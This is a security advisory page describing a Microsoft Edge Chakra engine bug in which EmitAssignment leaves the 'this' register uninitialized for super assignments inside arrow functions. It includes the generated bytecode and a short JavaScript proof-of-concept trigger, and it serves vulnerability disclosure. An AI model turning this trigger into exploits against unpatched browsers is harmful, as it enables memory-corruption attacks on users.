Microsoft Edge Chakra EmitAssignment uses the 'this' Register Without Initializing

2017.08.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- "EmitAssignment" doesn't call "EmitSuperMethodBegin" that initializes the "this" register for the case when the super keyword is used. Here's the generated bytecode for the lambda function in the PoC. R5 is uninitialized. Function Anonymous function ( (#1.3), #4) (In0) (size: 7 [7]) 9 locals (1 temps from R8), 1 inline cache Constant Table: ======== ===== R1 LdRoot R2 Ld_A (undefined) R3 LdC_A_I4 int:1 0000 ProfiledLdEnvSlot R6 = [1][4] <0> 000c ProfiledLdEnvSlot R4 = [1][3] <1> Line 28: super.a = 1; Col 13: ^ 0018 LdHomeObjProto R8 R4 001d ProfiledStSuperFld R8.(this=R5) = R3 #0 <0> 0025 LdUndef R0 Line 29: } Col 9: ^ 0027 Ret PoC: --> class Parent { }; class Child extends Parent { constructor() { (() => { super.a = 10; // Implicitly use the "this" register. So it must be initialized. })(); } }; new Child();

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1283


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top